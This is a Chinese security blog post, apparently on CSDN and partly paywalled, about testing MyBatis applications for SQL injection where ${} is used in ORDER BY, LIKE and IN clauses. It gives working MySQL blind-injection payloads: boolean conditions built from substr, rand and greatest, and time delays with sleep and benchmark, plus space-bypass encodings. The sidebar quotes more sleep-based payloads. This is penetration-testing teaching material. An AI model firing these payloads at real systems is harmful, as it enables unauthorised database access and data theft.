与SQL注入可以说的二三事

最新推荐文章于 2024-03-04 14:58:58 发布
最新推荐文章于 2024-03-04 14:58:58 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: web安全 文章标签: mysql mybatis sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crystal_shrimps/article/details/106453931
版权

写在前面

数据库:mysql
语言:java
代码审计发现,mybatis默认使用预编译#传参,只有少部分语句无法直接使用#传参,会报错,所以开发容易忽视这些地方,直接使用默认的.$传参,这就是我们测试sql注入的重要关注点。

order by
like
in

注入点(Mysql)

Tip: http传参不能带空格,用+代替

比如注释符,mysql的注释符是--空格#,从前端输入sql语句用--+,实际上经过url解码,传入数据库时变成--空格

普通参数注入

盲注

盲注三种类型

  1. 基于时间的
  2. 基于布尔的
  3. 基于报错的

orderby排序

order by用在sql语句的最后,起一个排序的作用,不能直接用and 1=1来判断

可以用if语句、case whenrand

order by基本用盲注

布尔盲注

mysql> select * from admin order by if(1=1,username,password);

如果1=1成立,按照username排序,反之根据password排序
替换1=1可判断数据库名等操作

mysql> select * from admin order by if((substr((select user()),1,1)='r'),username,password);

不用if,用rand()
rand(0)和rand(1)

if((length(database())=5),rand(true),rand(false))

greatest(n1,n2…)返回最大的数,(其他函数见->大小于号绕过)

mysql> select * from user order by rand(greatest(ascii(substr(database(),1,1)),1)=103);
//判断数据库名第一位

延时注入

sleep()是mysql数据库特有,sleep()在where语句中会执行多次,所以查询时间会成倍增长

if(布尔盲注语句,sleep(5),1)

可用benchmark(2000000,md5(404))代替,执行md5(404)2000000次,大概3秒多

  1. 寻找注入点
?orderby=asc,if(now()=sysdate(),sleep(3),0)
//如果系统时间等于当前时间,则mysql查询休眠3秒,否则查询0

//另一种写法:
select * from test order by user_id,(select 1 from (select sleep(3))a)
?order=asc,if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(10)))test))

//空格用 + 或 /**/ 替代
(select+1+from+(select+sleep(3))a)
(select/**/1/**/from/**/(select/**/sleep(3))a)
  1. 猜数据库长度,数据库名
?orderby
最低0.47元/天 解锁文章
Noah747
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于HTTP头部的注入
seaboat——a free boat on the sea.(公众号:远洋号)
06-13 1万+
基于HTTP头部的注入常见的sql注入一般都是通过表单或请求参数进行注入,但这里给出的例子是通过HTTP协议头部进行注入。例如一个的请求如下:GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image
春秋云境:CVE-2022-32991(sql注入
yh
12-01 764
CMS的welcome.php中存在SQL注入攻击
SQL注入 时间延时注入语句
qq_44806973的博客
11-15 2475
id=3 AND (SELECT 5537 FROM (SELECT(SLEEP(15)))PIKH) id=0’XOR(if(now()=sysdate(),sleep(6),0))XOR’Z
时间盲注脚本.py
weixin_30274627的博客
03-10 357
时间盲注脚本 1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 import requests 4 import time 5 6 payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹...
php二维数组根据键值返回,php二维数组根据指定键值重新排序
weixin_30571837的博客
04-09 431
:支持免登录发表评论12020-07-12 10:15:07 回复:支持免登录发表评论2021-03-08 19:53:56 回复:请先登录后回复评论2021-03-08 19:54:12 回复:请先登录后回复评论2021-03-08 19:54:18 回复:支持免登录发表评论2021-03-08 20:04:13 回复:支持免登录发表评论2021-03-08 20:04:14 回复:支持免登录发...
Mysql 被注入语句
Andy ` 勋章的博客
02-19 110
POST提交来的数据:1'and(select*from(select+sleep(4))a/**/union/**/select+1)=': 用于在特殊字符前添加反斜杠,可以用于过滤用户输入的数据,防止SQL注入攻击。
mysql基于时间盲注_MYSQL基于时间的盲注详解
weixin_30864831的博客
02-08 1170
MYSQL基于时间的盲注联合查询,报错注入,以及布尔盲注,都是基于攻击网站会回显消息,或者将错误信息返回在前端,或者会返回web页面的正确或错误但是有时候网站关闭了错误回显或过滤了某些关键字,网页会返回一种状态(status,只要进行了http传输,那么就会有一个状态值),这时候就要用到时间盲注时间盲注的基本函数if(1,2,3):如果1为True,则执行2,否则执行3sleep(x):延迟x秒之...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
C#防SQL注入代码的三种方法
12-31
对于网站的安全性,是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞,那势必将造成很大的损失。为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全... C#防SQL注入方法一  在Web.config文件中
PHP与SQL注入攻击[三]
10-30
PHP与SQL注入攻击[三]
pangolinsdl—sql注入工具
06-20
PangolinsDL是一款强大的SQL注入检测工具,它可以帮助用户识别和利用SQL注入漏洞。该工具支持多种数据库系统,包括MySQL、Oracle、SQL Server等,能够进行深度扫描和智能分析,提供详细的漏洞报告。 2. **功能特性...
mysql注入报错函数_MySQL注入常用函数
weixin_42394780的博客
01-30 418
注入的分类仁者见仁,智者见智。基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注基于如何处理输入的 SQL 查询(数据类型)•基于字符串•数字或整数为基础的基于程度和顺序的注入(哪里发生了影响)★一阶注射 指输入的注射语句对 WEB 直接产生了影响,出现了结果★二阶注射 类似存...
mysql安全性案例分析_技术讨论 | 某真实渗透实践案例分析
weixin_42154650的博客
02-27 277
猜测xxx.xxx.22.189ip公网ip每个端口单独映射到内网系统2.2实战开始前期搜集的资产信息越广,我们的攻击面就越多,所以后期的成就是建立在前期的信息搜集之上。2.2.1首先对目标进行测试发现官网存在sql时间盲注延迟注入,是一种盲注的手法,提交对执行时间敏感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级...
2、Bluecms代码审计
最新发布
Yzz_的博客
03-04 542
【代码】2、Bluecms代码审计。
SQL注入时间盲注
qq_43936524的博客
03-13 5761
文章目录sqlmap日记溯源实例发现时间盲注构造时间盲注payload编写脚本成功跑出数据库sqlmap日记溯源 实例 发现时间盲注 一个实用的时间盲注fuzz payload 在一次测试中,发现一个参数存在时间盲注,fuzz的payload为desc,(select*from(select+sleep(2)union/**/select+1)a),其中(select*from(select+sleep(2)union/**/select+1)a))是检测时间盲注时一个很好用的fuzz payload。
web安全渗透测试十大常规项(一):web渗透测试之MySQL注入
HACKONE的博客
03-12 1387
渗透测试之SQL注入基础SQL注入类型按照数据类型类型来分类按照执行效果来分类(页面回显效果)按照数据提交的方式来分类判断注入类型的方法MySQL注入基础联合查询注入布尔注入时间盲注注入报错注入宽字节注入二次注入偏移注入DNSlog注入注入写webshellSQL注入绕过空格绕过(过滤空过)关键字过滤SQL注入绕WAF SQL注入类型 按照数据类型类型来分类 数字型注入点 在 Web 端大概是 http://xxx.com/news.php?id=1 这种形式,其注入点 id 类型为数字,所以叫数字型注
CTF 中的 SQL 注入总结
重新启程
10-12 4813
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
未授权访问漏洞
crystal_shrimps的博客
07-07 4283
一、resin 1 任意文件读取 默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。 payload # viewfile任意文件读取 http://localhost/resin-doc/viewfile/?file=index.jsp # jndi-appconfig inputFile任意文件读取/SSRF http://localhost/resin-doc/resource/tut
SQL注入与二阶SQL注入有什么区别
05-17
SQL注入是一种常见的网络安全漏洞,攻击者可以通过在应用程序的输入框中注入恶意的SQL代码来获取敏感信息或者对数据库进行非法操作。 二阶SQL注入是一种更高级的SQL注入攻击方式,攻击者通过在应用程序中嵌入含有SQL注入漏洞的恶意代码,使得应用程序在执行SQL语句时,将恶意代码中的SQL语句作为参数传递给后端数据库,从而达到攻击的目的。与一般的SQL注入攻击不同的是,二阶SQL注入攻击需要攻击者在应用程序中嵌入一定的恶意代码,并且需要一定的技术水平。 总的来,二阶SQL注入比一般的SQL注入攻击更加难以发现和防范,因此需要开发人员在设计和开发应用程序时,加强对输入数据的过滤和验证,从而有效防范SQL注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值